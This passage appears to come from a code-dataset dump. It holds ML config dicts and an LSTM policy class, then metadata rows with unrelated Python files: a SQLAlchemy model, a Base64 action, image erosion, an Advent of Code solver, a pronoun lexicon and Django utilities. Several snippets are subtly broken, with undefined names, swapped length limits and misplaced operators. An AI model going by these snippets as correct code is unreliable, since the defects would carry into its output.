        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 3,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                        2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : sample_depth_future_cfg,
    'seed' : 0
}
# Same layout as sample_cfg with a deeper (5-layer) uncertainty encoder and
# the larger depth-future world model.
another_sample_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 64, 64, 3],  # (timesteps, H, W, C)
        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 5,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
                5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                        2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : a_bigger_depth_future_config,
    'seed' : 0
}
# Full-resolution (128x170) variant: same 5-layer uncertainty encoder as
# another_sample_cfg, paired with default_damian_cfg's world model.
default_damian_full_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 128, 170, 3],  # (timesteps, H, W, C)
        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 5,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
                5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                        2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : default_damian_cfg,
    'seed' : 0
}
class LSTMDiscretePolicy:
    """Actor-critic policy: conv encoder -> LSTM -> value head and
    discrete-action logits head, with a categorical action sampler.

    NOTE(review): several names used here are not defined in this class or
    visible at module level in this chunk — `kwargs`, `reuse_weights`,
    `use_tf100_api`, `step_size`, `size`, and `ac_space` (this mirrors
    universe-starter-agent's LSTMPolicy, where they are defined in scope).
    Confirm they exist at module level before using this class.
    """
    def __init__(self, cfg):
        self.x = x = tf.placeholder(tf.float32, [None] + cfg['state_shape'])
        m = ConvNetwithBypasses(**kwargs)  # NOTE(review): `kwargs` undefined here
        x = feedforward_conv_loop(x, m, cfg, desc = 'size_1_before_concat', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
        # add a fake batch dim of 1: dynamic_rnn treats the true batch as time
        x = tf.expand_dims(flatten(x), [0])
        lstm_size = cfg['lstm_size']
        # rnn cell API moved between TF versions
        if use_tf100_api:
            lstm = rnn.BasicLSTMCell(lstm_size, state_is_tuple = True)
        else:
            lstm = rnn.rnn_cell.BasicLSTMCell(lstm_size, state_is_tuple = True)
        self.state_size = lstm.state_size
        # zero initial LSTM state, exposed for rollout bookkeeping
        c_init = np.zeros((1, lstm.state_size.c), np.float32)
        h_init = np.zeros((1, lstm.state_size.h), np.float32)
        self.state_init = [c_init, h_init]
        c_in = tf.placeholder(tf.float32, [1, lstm.state_size.c])
        h_in = tf.placeholder(tf.float32, [1, lstm.state_size.h])
        self.state_in = [c_in, h_in]
        if use_tf100_api:
            state_in = rnn.LSTMStateTuple(c_in, h_in)
        else:
            state_in = rnn.rnn_cell.LSTMStateTuple(c_in, h_in)
        lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
            lstm, x, initial_state=state_in, sequence_length=step_size,
            time_major=False)  # NOTE(review): `step_size` undefined here
        lstm_c, lstm_h = lstm_state
        self.state_out = [lstm_c[:1, :], lstm_h[:1, :]]
        x = tf.reshape(lstm_outputs, [-1, size])  # NOTE(review): `size` undefined here
        self.vf = hidden_loop_with_bypasses(x, m, cfg['value'], reuse_weights = False, train = True)
        self.logits = hidden_loop_with_bypasses(x, m, cfg['logits'], reuse_weights = False, train = True)
        self.sample = categorical_sample(self.logits, ac_space)[0, :]  # NOTE(review): `ac_space` undefined here
        self.var_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, tf.get_variable_scope().name)

    def get_initial_features(self):
        """Return the zero initial LSTM state [c, h]."""
        return self.state_init

    def act(self, ob, c, h):
        """Sample an action for observation `ob` given LSTM state (c, h);
        returns [action, value, new_c, new_h]."""
        sess = tf.get_default_session()
        return sess.run([self.sample, self.vf] + self.state_out,
                        {self.x: [ob], self.state_in[0]: c, self.state_in[1]: h})

    def value(self, ob, c, h):
        """Return the value estimate for `ob` given LSTM state (c, h)."""
        sess = tf.get_default_session()
        return sess.run(self.vf, {self.x: [ob], self.state_in[0]: c, self.state_in[1]: h})[0]
| 83,499 | 127 | 1,629 |
f285b53393c80a26f933621bf1ae088ff4e1744b | 20 | py | Python | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | 1 | 2019-06-22T23:27:48.000Z | 2019-06-22T23:27:48.000Z | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | null | null | null | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | null | null | null | print("part1包被导入了~") | 20 | 20 | 0.75 | print("part1包被导入了~") | 0 | 0 | 0 |
4c31524748798164fb9eae86397590e6f331b78e | 3,554 | py | Python | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 56 | 2018-09-26T05:03:51.000Z | 2022-02-16T12:27:46.000Z | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 25 | 2018-08-14T05:33:29.000Z | 2022-02-13T00:50:21.000Z | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 5 | 2019-08-05T03:59:01.000Z | 2022-01-07T06:44:12.000Z | from dictdiffer import diff
from sqlalchemy import Column, Integer, String
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
| 33.847619 | 119 | 0.619021 | from dictdiffer import diff
from sqlalchemy import Column, Integer, String
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
# Column-length caps; parse_input/truncate_str shorten incoming strings to fit.
MAX_NAME_LENGTH = 100
MAX_SIGN_LENGTH = 200
MAX_URL_LENGTH = 200
# primary key: the user's numeric id
id = Column('id', Integer, primary_key=True)
username = Column(String(MAX_NAME_LENGTH))
nickname = Column(String(MAX_NAME_LENGTH))
url = Column(String(MAX_URL_LENGTH))
# dict of avatar URLs (large/medium/small), stored as JSONB
avatar = Column(JSONB)
sign = Column(String(MAX_SIGN_LENGTH))
user_group = Column(Integer)
def __init__(self, user):
    """Build a User row from a raw user dict, normalizing it via parse_input."""
    self.set_attribute(self.parse_input(user))
def __repr__(self):
return '<User(id = %s, username = %s)>' % (self.id, self.username)
def update(self, user):
self.parse_input(user)
@staticmethod
def parse_input(user):
"""
parse the raw dict into a normalized one
:param user: raw user
:return: parsed dict
"""
parsed_user = {'id': user.get('id'), 'username': User.truncate_str(user.get('username'), User.MAX_NAME_LENGTH),
'nickname': User.truncate_str(user.get('nickname'), User.MAX_URL_LENGTH),
'url': User.truncate_str(user.get('url'), User.MAX_NAME_LENGTH),
'avatar': User.parse_avatar(user.get('avatar')),
'sign': User.truncate_str(user.get('sign'), User.MAX_SIGN_LENGTH),
'user_group': user.get('usergroup')}
return parsed_user
@staticmethod
def truncate_str(raw_str, max_length):
"""
truncate string to max_length, or return None if it's not a string
:param raw_str: raw string
:param max_length: max length
:return:
"""
if not isinstance(raw_str, str):
return None
return raw_str[:max_length - 2] + '..' if len(raw_str) > max_length else raw_str
@staticmethod
def parse_avatar(raw_avatar):
"""
Parse raw avatar into a normalized one
:param raw_avatar: raw avatar
:return: parsed avatar
"""
if not isinstance(raw_avatar, dict):
return None
max_image_url_length = 200
parsed_images = {
'large': raw_avatar.get('large', 'https://lain.bgm.tv/pic/user/l/icon.jpg')[:max_image_url_length],
'medium': raw_avatar.get('medium', 'https://lain.bgm.tv/pic/user/m/icon.jpg')[:max_image_url_length],
'small': raw_avatar.get('small', 'https://lain.bgm.tv/pic/user/s/icon.jpg')[:max_image_url_length],
}
return parsed_images
def set_attribute(self, parsed_user):
"""
Set attribute in user
:param parsed_user:
:return:
"""
self.id = parsed_user.get('id')
self.username = parsed_user.get('username')
self.nickname = parsed_user.get('nickname')
self.url = parsed_user.get('url')
self.avatar = parsed_user.get('avatar')
self.sign = parsed_user.get('sign')
self.user_group = parsed_user.get('user_group')
def diff_self_with_input(self, subject_dict):
"""
Diff the input dict with current object
:param subject_dict: a dict representation of the subject
:return: a dictdiffer object
"""
difference = diff(self.__dict__, subject_dict, ignore={'_sa_instance_state'})
return difference
| 195 | 3,128 | 23 |
2424f44d4a7d2f813ed93006a67acd97aaa9bb66 | 1,067 | py | Python | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 6 | 2020-11-10T03:07:00.000Z | 2022-02-24T18:07:57.000Z | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 17 | 2020-01-21T16:02:04.000Z | 2022-01-12T15:11:26.000Z | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 2 | 2020-12-26T11:33:23.000Z | 2021-09-30T22:22:43.000Z | import komand
from .schema import DecodeInput, DecodeOutput
import base64
| 31.382353 | 73 | 0.554827 | import komand
from .schema import DecodeInput, DecodeOutput
import base64
class Decode(komand.Action):
    """Action that decodes a Base64 string into UTF-8 text."""

    def __init__(self):
        super(self.__class__, self).__init__(
            name='decode',
            description='Decode Base64 to data',
            input=DecodeInput(),
            output=DecodeOutput())

    def run(self, params={}):
        """Decode the ``base64`` param; ``errors`` selects the decode error mode."""
        try:
            decoded = base64.standard_b64decode(params.get('base64'))
            error_mode = params.get('errors')
            if error_mode not in ("replace", "ignore"):
                return {'data': decoded.decode('utf-8')}
            return {'data': decoded.decode('utf-8', errors=error_mode)}
        except Exception as e:
            self.logger.error("An error has occurred while decoding ", e)
            raise

    def test(self):
        """Self-test against a known Base64 value."""
        result = base64.standard_b64decode('YmFzZTY0').decode('utf-8')
        if result == 'base64':
            return {'data': result}
        raise Exception('Base64 decode failed: %s') % result
| 881 | 7 | 104 |
c6dcf725bd23764de094f21a2a52e9e26e955427 | 1,982 | py | Python | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | 2 | 2020-02-06T17:30:41.000Z | 2020-08-04T10:35:46.000Z | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | null | null | null | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | null | null | null | import os
import shutil
import json
import time
import cv2
import numpy as np
import PIL
if __name__ == '__main__' :
erode_all(True) | 29.58209 | 88 | 0.639758 | import os
import shutil
import json
import time
import cv2
import numpy as np
import PIL
def convert_image_to_numpy(image) :
    """Convert a PIL-style image to an (H, W, C) uint8 numpy array.

    ``image`` only needs a ``size`` attribute and a ``tobytes()`` method.
    The channel count is inferred from the buffer length.
    """
    (im_width, im_height) = image.size
    # np.frombuffer replaces the removed/deprecated np.fromstring binary mode.
    image_np = np.frombuffer(image.tobytes(), dtype='uint8')
    array_shape = (im_height, im_width, int(image_np.shape[0] / (im_height * im_width)))
    return image_np.reshape(array_shape).astype(np.uint8)
def convert_numpy_to_image(image_np) :
    """Wrap a numpy array as a PIL image."""
    return PIL.Image.fromarray(image_np)
def postprocess(image, erode_by) :
    """Erode ``image`` with a square ``erode_by`` x ``erode_by`` kernel.

    PIL images are converted to numpy, eroded, and converted back;
    numpy arrays are eroded and returned directly.
    """
    kernel = np.ones((erode_by, erode_by), np.uint8)
    if not isinstance(image, PIL.Image.Image) :
        return cv2.erode(image, kernel)
    eroded = cv2.erode(convert_image_to_numpy(image), kernel)
    return convert_numpy_to_image(eroded)
def save_file(image, original_file, prefix, json_data) :
    """Write an eroded image plus its JSON sidecar, prefixed with ``prefix``E-."""
    out_name = prefix + "E-" + original_file
    cv2.imwrite(out_name, image)
    # Keep the metadata in sync with the new filename.
    json_data["filename"] = out_name
    sidecar = out_name[:-3] + "json"
    with open(sidecar, "w") as json_file :
        json.dump(json_data, json_file, indent=4)
def erode_all(save_as_hsv) :
    """Erode every png/jpg image in the cwd with 3x3 and 5x5 kernels.

    Each eroded copy is written via :func:`save_file` together with its
    updated JSON sidecar.  When ``save_as_hsv`` is true the image is
    converted to HSV before eroding.
    """
    kernel5 = np.ones((5,5),np.uint8)
    kernel3 = np.ones((3,3),np.uint8)
    for file in os.listdir('.') :
        # Bug fix: the original tested membership in the single string
        # "png, jpg" (adjacent literals), which also matched tails such
        # as ", j" or " jp"; a tuple checks the extension exactly.
        if not file.lower()[-3:] in ("png", "jpg") :
            continue
        print(file)
        json_filename = file[:-3] + "json"
        with open(json_filename, "r") as json_file :
            json_data = json.load(json_file)
        image = cv2.imread(file)
        if save_as_hsv :
            image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)
        save_file(cv2.erode(image, kernel3), file, "3", json_data)
        save_file(cv2.erode(image, kernel5), file, "5", json_data)
# Script entry point: erode all images in the cwd, converting to HSV first.
if __name__ == '__main__' :
    erode_all(True)
1f5f867f3aa5f7e0ba66ce34207df1dc5f2a5fb9 | 1,636 | py | Python | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | import sys
import unittest
import re
from operator import itemgetter
import argparse
import traceback
# print arg
if __name__=='__main__':
codes = []
for line in sys.stdin:
codes.append(line.strip())
print(part_one(codes))
print(part_two(codes))
| 25.968254 | 90 | 0.562958 | import sys
import unittest
import re
from operator import itemgetter
import argparse
import traceback
class TestStuff(unittest.TestCase):
    """Unit tests for boarding-pass seat-ID decoding."""

    def data(self):
        """Return (code, row, seat, seat_id) sample cards from the puzzle text."""
        return [("FBFBBFFRLR", 44, 5, 357),
                ("BFFFBBFRRR", 70, 7, 567),
                ("FFFBBBFRRR", 14, 7, 119),
                ("BBFFBBFRLL", 102, 4, 820)]

    def test_one(self):
        """Each sample code must decode to its documented seat ID."""
        for code, row, seat, seat_id in self.data():
            # Bug fix: assertTrue(x, y) treats y as the failure message and
            # never compares the two values; use assertEqual instead.
            self.assertEqual(calculate_id(code), seat_id)
def debug(arg):
    """No-op debug hook; re-enable the print below to trace values."""
    pass
# print(arg)
def calculate_id(code):
    """Decode a full boarding pass to its seat ID: B/R are 1-bits, F/L are 0-bits."""
    table = str.maketrans("FBLR", "0101")
    return int(code.translate(table), 2)
def decode(code):
    """Split a pass into (row, column): first 7 chars encode row, last 3 column."""
    row_bits = code[:7].replace('F', '0').replace('B', '1')
    col_bits = code[7:].replace('L', '0').replace('R', '1')
    return int(row_bits, 2), int(col_bits, 2)
def decode2(code):
    """Decode a full pass straight to its seat ID (row * 8 + column)."""
    bits = code.replace('F', '0').replace('B', '1')
    bits = bits.replace('L', '0').replace('R', '1')
    return int(bits, 2)
def parse(lines):
    """Decode every line into a (row, column) card and return the list.

    Bug fix: the original built the ``cards`` list but never returned it,
    so every call produced None.
    """
    return [decode(line) for line in lines]
def part_one(codes):
    """Return the highest seat ID among all boarding passes."""
    return max(map(calculate_id, codes))
def part_two(codes):
    """Find your seat: the single missing ID between two occupied seats.

    Bug fix: the original loop read ``all_seats[i + 1]`` for every index
    including the last (IndexError when no gap exists) and skipped the
    first pair because of the ``i > 0`` guard.
    """
    all_seats = sorted(calculate_id(code) for code in codes)
    for lower, upper in zip(all_seats, all_seats[1:]):
        if upper - lower != 1:
            return lower + 1
    return None
# Script entry point: read boarding-pass codes from stdin (one per line),
# then print the part-one and part-two puzzle answers.
if __name__=='__main__':
    codes = []
    for line in sys.stdin:
        codes.append(line.strip())
    print(part_one(codes))
    print(part_two(codes))
168126d2820d2157fdd1ef197a9231cf648a48f9 | 3,613 | py | Python | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 19 | 2019-07-18T21:38:38.000Z | 2020-10-24T09:23:37.000Z | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 1 | 2019-11-29T02:58:08.000Z | 2019-12-01T06:11:16.000Z | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 2 | 2019-12-18T11:37:39.000Z | 2020-02-04T16:23:20.000Z | from collections import defaultdict
# name list obtained from: https://www.ssa.gov/oact/babynames/decades/century.html
# accessed on Nov 6th, 2018
if __name__ == '__main__':
lex = PronounLexicon()
all_words = lex.all_words()
in_file_path = "data/CBTest/data/cbt_train.txt"
all_lens = []
all_gaps = []
with open(in_file_path) as f:
for line in f:
line = line.strip()
marked_sentence = [1 if w in all_words else 0 for w in line.split(' ')]
all_lens.append(len(marked_sentence))
# print(marked_sentence)
gaps = find_gaps(marked_sentence)
# print(gaps)
all_gaps.extend(gaps)
import numpy as np
print(np.mean(all_lens), np.std(all_lens))
print(np.mean(all_gaps), np.std(all_gaps))
# l = 32 covers 81.5% of the sentences
# l = 64 covers 98.4% of the sentences
l = 64
print(len(list(filter(lambda x: x <= l, all_lens))) / float(len(all_lens)))
# l = 10 covers 82.7% of the gaps
# l = 20 covers 97.2% of the gaps
# l = 30 covers 99.4% of the gaps
l = 20
print(len(list(filter(lambda x: x <= l, all_gaps))) / float(len(all_gaps)))
| 35.421569 | 104 | 0.549405 | from collections import defaultdict
# name list obtained from: https://www.ssa.gov/oact/babynames/decades/century.html
# accessed on Nov 6th, 2018
class PronounLexicon():
    """Lexicon of pronouns grouped by feature=value keys read from a TSV file.

    Each line of the lexicon file is ``word feat1=v1,feat2=v2,...``; the
    word is appended under every ``feat=value`` key it carries.
    """
    def __init__(self, lexfile='pronouns.tsv'):
        self.lexicon = defaultdict(lambda : [])
        with open(lexfile) as fin:
            for line in fin:
                # Skip blank / near-empty lines.
                if len(line) > 2:
                    word = line.split()[0]
                    feats = dict(x.split('=') for x in line.split()[1].split(','))
                    for feat,val in feats.items():
                        self.lexicon['='.join([feat,val])].append(word)
        print(f"Read lexicon from {lexfile}:\n{self.lexicon}")
    def make_lex(self,feature,dictionary):
        '''
        given a fairseq dictionary, export a list of word idxs that match a desired feature
        '''
        return [idx for word,idx in dictionary.indices.items() if word.lower() in self.lexicon[feature]]
    def all_word_idxs(self,dictionary):
        """Return idxs of every dictionary word present anywhere in the lexicon."""
        return [idx for word,idx in dictionary.indices.items() if word.lower() in self.all_words()]
    def all_words(self):
        """Return the set of all words across every feature bucket."""
        output = set()
        for subset in self.lexicon.values():
            for word in subset:
                output.add(word)
        return output
    def get_feature_set(self, feature_set):
        """Union of lexicon buckets for each feature key in ``feature_set``."""
        output = set()
        for t in feature_set:
            output |= set(self.lexicon[t])
        return output
    def annotate_feature_chunk_end(self, sentence, chunk_tags, feature_set):
        """Mark the token ending each chunk that contains a matching pronoun.

        ``chunk_tags`` appear to use BILOU-style prefixes ('U-', 'L-', 'O');
        for a pronoun inside a multi-token chunk, the 1 is placed on the
        chunk's 'L-' (last) token rather than on the pronoun itself.
        Returns a 0/1 list aligned with ``sentence``.
        """
        pronoun_lexicons = self.get_feature_set(feature_set)
        assert len(sentence) == len(chunk_tags)
        output = [0 for _ in range(len(sentence))]
        for i, (token, chunk_tag) in enumerate(zip(sentence, chunk_tags)):
            if token.lower() in pronoun_lexicons:
                if chunk_tag == 'O' or chunk_tag[:2] == 'U-':
                    # Outside any chunk, or a unit-length chunk: mark here.
                    output[i] = 1
                else:
                    # Scan forward to the end of the current chunk.
                    chunk_type = chunk_tag[2:]
                    for j in range(i, len(sentence)):
                        end_chunk = chunk_tags[j]
                        assert end_chunk[2:] == chunk_type
                        if end_chunk[:2] == 'L-':
                            output[j] = 1
                            break
        return output
def find_gaps(sentence):
    """Return distances between consecutive marked (1) positions in ``sentence``.

    Bug fix: the original loop bounded itself on the global
    ``marked_sentence`` (only defined in the __main__ block) and started
    at index -1, reading the last element first; it now scans the
    ``sentence`` parameter from the start.
    """
    gaps = []
    prev = -1
    for cur, flag in enumerate(sentence):
        if flag == 1:
            if prev != -1:
                gaps.append(cur - prev)
            prev = cur
    return gaps
# Script entry point: mark lexicon words in each CBT training sentence,
# then report sentence-length and gap statistics plus the coverage of a
# couple of candidate cutoffs.  NOTE(review): find_gaps reads the global
# ``marked_sentence`` set in this loop rather than its own argument.
if __name__ == '__main__':
    lex = PronounLexicon()
    all_words = lex.all_words()
    in_file_path = "data/CBTest/data/cbt_train.txt"
    all_lens = []
    all_gaps = []
    with open(in_file_path) as f:
        for line in f:
            line = line.strip()
            # 1 where the token is a lexicon word, 0 elsewhere.
            marked_sentence = [1 if w in all_words else 0 for w in line.split(' ')]
            all_lens.append(len(marked_sentence))
            # print(marked_sentence)
            gaps = find_gaps(marked_sentence)
            # print(gaps)
            all_gaps.extend(gaps)
    import numpy as np
    print(np.mean(all_lens), np.std(all_lens))
    print(np.mean(all_gaps), np.std(all_gaps))
    # l = 32 covers 81.5% of the sentences
    # l = 64 covers 98.4% of the sentences
    l = 64
    print(len(list(filter(lambda x: x <= l, all_lens))) / float(len(all_lens)))
    # l = 10 covers 82.7% of the gaps
    # l = 20 covers 97.2% of the gaps
    # l = 30 covers 99.4% of the gaps
    l = 20
    print(len(list(filter(lambda x: x <= l, all_gaps))) / float(len(all_gaps)))
| 1,928 | 409 | 50 |
9b8cd41c9a88310c1ecf7675400e3a30e40f64f5 | 547 | py | Python | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.2.2 on 2021-06-29 09:49
import django.core.validators
from django.db import migrations, models
| 27.35 | 169 | 0.669104 | # Generated by Django 3.2.2 on 2021-06-29 09:49
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional ``fov`` float field (0.1-180, default 60.0) to Viewpoint."""

    dependencies = [
        ('EasyView', '0007_viewpoint_clip_constants_status'),
    ]

    operations = [
        migrations.AddField(
            model_name='viewpoint',
            name='fov',
            field=models.FloatField(blank=True, default=60.0, validators=[django.core.validators.MinValueValidator(0.1), django.core.validators.MaxValueValidator(180)]),
        ),
    ]
| 0 | 403 | 23 |
d31eb94754bb97b7c63aef350da8ea3fdf10c568 | 70 | py | Python | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | 1 | 2022-02-15T21:30:36.000Z | 2022-02-15T21:30:36.000Z | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | null | null | null | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | 1 | 2022-02-08T19:32:45.000Z | 2022-02-08T19:32:45.000Z | # Autogenerated file.
from .client import ButtonClient # type: ignore
| 23.333333 | 47 | 0.785714 | # Autogenerated file.
from .client import ButtonClient # type: ignore
| 0 | 0 | 0 |
868d426e9569bb6634ef8b4f72fc5b8acd6b361f | 1,938 | py | Python | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | import yaml
import os
from pathlib import Path
from django.conf import settings
from django.core.management.base import BaseCommand
from apps.findings import models
| 41.234043 | 184 | 0.645511 | import yaml
import os
from pathlib import Path
from django.conf import settings
from django.core.management.base import BaseCommand
from apps.findings import models
class Command(BaseCommand):
    help = 'Import vulnerability templates from JSON file'

    def add_arguments(self, parser):
        """Register the optional --file argument."""
        parser.add_argument('--file', type=str)

    def handle(self, *args, **options):
        """Import templates from --file, or every resources/templates info.yaml.

        Bug fix: the import counter used to be passed by value into
        ``_import_file`` and incremented there, so the success message
        always reported 0; the helper now returns its count.
        """
        import_counter = 0
        if options.get('file'):
            import_counter += self._import_file(options.get('file'))
        else:
            for path in Path(os.path.join(settings.BASE_DIR, 'resources/templates')).rglob('info.yaml'):
                import_counter += self._import_file(path)
        self.stdout.write(self.style.SUCCESS('Successfully imported/updated "%s" templates' % import_counter))

    def _get_description(self, filename):
        """Read the description_en.md sitting next to ``filename``."""
        desc_filename = str(filename).replace("info.yaml", "description_en.md")
        with open(desc_filename) as f:
            return f.read()

    def _get_resolution(self, filename):
        """Read the resolution_en.md sitting next to ``filename``."""
        desc_filename = str(filename).replace("info.yaml", "resolution_en.md")
        with open(desc_filename) as f:
            return f.read()

    def _import_file(self, filename):
        """Import every template in one info.yaml; return how many were created."""
        created_count = 0
        with open(filename, "r") as f:
            for item in yaml.safe_load(f):
                description = self._get_description(filename)
                resolution = self._get_resolution(filename)
                template, created = models.Template.objects.update_or_create(name=item["name"],
                    defaults={"description": description, 'cve_id': item.get('cve_id'), 'ease_of_resolution': item.get('ease_of_resolution', "undetermined"), 'resolution': resolution})
                if created:
                    # References are only attached on first creation.
                    for reference in item.get('references', []):
                        models.Reference.objects.create(template=template, name=reference)
                    created_count += 1
        return created_count
| 1,548 | 201 | 23 |
3971d41dd74aa8b1d61ef664ed7ac809a3618325 | 1,153 | py | Python | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | import sys
from django.test import TestCase
error_while_importing = None
try:
from easymode import *
from easymode.admin import *
from easymode.admin.forms import *
from easymode.admin.models import *
from easymode.debug import *
from easymode.i18n import *
from easymode.i18n.admin import *
from easymode.management import *
from easymode.middleware import *
from easymode.management.commands import *
from easymode.templatetags import *
from easymode.tree import *
from easymode.tree.admin import *
from easymode.tree.admin.widgets import *
from easymode.urls import *
from easymode.utils import *
from easymode.views import *
from easymode.xslt import *
except Exception as e:
error_while_importing = e
__all__ = ('TestImportAll',)
class TestImportAll(TestCase):
"""Check if the import all works for every package in easymode"""
def test_import_all(self):
"""All easymode packages should be importable with * without any errors"""
if error_while_importing is not None:
self.fail("%s: %s" % (type(e).__name__, error_while_importing)) | 32.027778 | 83 | 0.711188 | import sys
from django.test import TestCase
error_while_importing = None
try:
from easymode import *
from easymode.admin import *
from easymode.admin.forms import *
from easymode.admin.models import *
from easymode.debug import *
from easymode.i18n import *
from easymode.i18n.admin import *
from easymode.management import *
from easymode.middleware import *
from easymode.management.commands import *
from easymode.templatetags import *
from easymode.tree import *
from easymode.tree.admin import *
from easymode.tree.admin.widgets import *
from easymode.urls import *
from easymode.utils import *
from easymode.views import *
from easymode.xslt import *
except Exception as e:
error_while_importing = e
__all__ = ('TestImportAll',)
class TestImportAll(TestCase):
    """Check if the import all works for every package in easymode"""

    def test_import_all(self):
        """All easymode packages should be importable with * without any errors"""
